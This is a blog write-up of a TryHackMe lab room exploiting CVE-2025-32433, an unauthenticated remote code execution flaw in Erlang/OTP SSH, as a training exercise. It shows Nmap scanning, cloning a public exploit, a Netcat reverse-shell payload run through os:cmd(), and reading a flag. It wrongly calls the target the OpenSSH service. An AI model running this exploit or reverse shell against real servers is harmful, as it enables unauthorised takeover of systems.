DEATHESTHER
← All write-ups

TRYHACKME WRITE-UP

Erlang/OTP SSH CVE-2025-32433 - TryHackMe writeup

Learn about and exploit Erlang/OTP SSH CVE-2025-32433 in a lab setup.

EasyLinuxCVE-2025-324335 min read

Open the room on TryHackMe ↗ View on GitHub

Task 1. Introduction

Erlang is a programming language made for building reliable, real-time systems that can handle many users at once. It was originally created by Ericsson for telecom use but is now used in many industries to build distributed systems.

OTP (Open Telecom Platform) is a set of tools and libraries that work with Erlang to help build these systems. Even though it started in telecom, OTP is now used more broadly for any kind of distributed application. Together, they're often called Erlang/OTP.

Erlang is used by many companies for product development and by universities for teaching and research.

One part of OTP is the SSH module, which lets Erlang systems use secure shell access and transfer files safely.

Recently, a critical vulnerability (CVE-2025-32433) was found in the Erlang/OTP SSH. It allows attackers to run code on the system without logging in. This issue was discovered by researchers at Ruhr University Bochum and has a CVSS score of 10.0, which means it’s extremely serious.

Task 2: Exploitation Walkthrough

Step 1: Reconnaissance

We begin by performing an initial service enumeration using Nmap:

nmap 10.10.237.184 -sV -sC

Nmap Output Summary:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     Erlang/5.2.9
2222/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9

The system is running two SSH services:


Step 2: CVE Exploitation

We will target the outdated OpenSSH service using a public exploit: CVE-2025-32433.

Clone the exploit from GitHub:

git clone https://github.com/ProDefense/CVE-2025-32433
cd CVE-2025-32433

Now, configure the IP and port in the exploit script as per the target:

Configuring exploit

Run the exploit:

python3 CVE-2025-32433.py

Expected Output:


Step 3: Reverse Shell Execution

To escalate and gain a reverse shell, modify the payload in the exploit to use Erlang's os:cmd() for command execution:

2025-04-25_14-12

Replace with:

os:cmd("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <your Vpn Ip> 8000 >/tmp/f | nc <your Vpn Ip> 4444").

Payload injection

Set up two Netcat listeners on the attack machine:

Terminal 1:

nc -lnvp 4444

Terminal 2:

nc -lnvp 8000

Once executed, you should receive a shell connection:

Netcat Shell Received


Step 4: Post-Exploitation

Now we are inside the system.

Shell Access Confirmation:

Shell confirmation

Retrieve User Flag:

cat flag.txt

Flag

Confirm Hostname:

uname -a

Hostname

c7b79fd068ba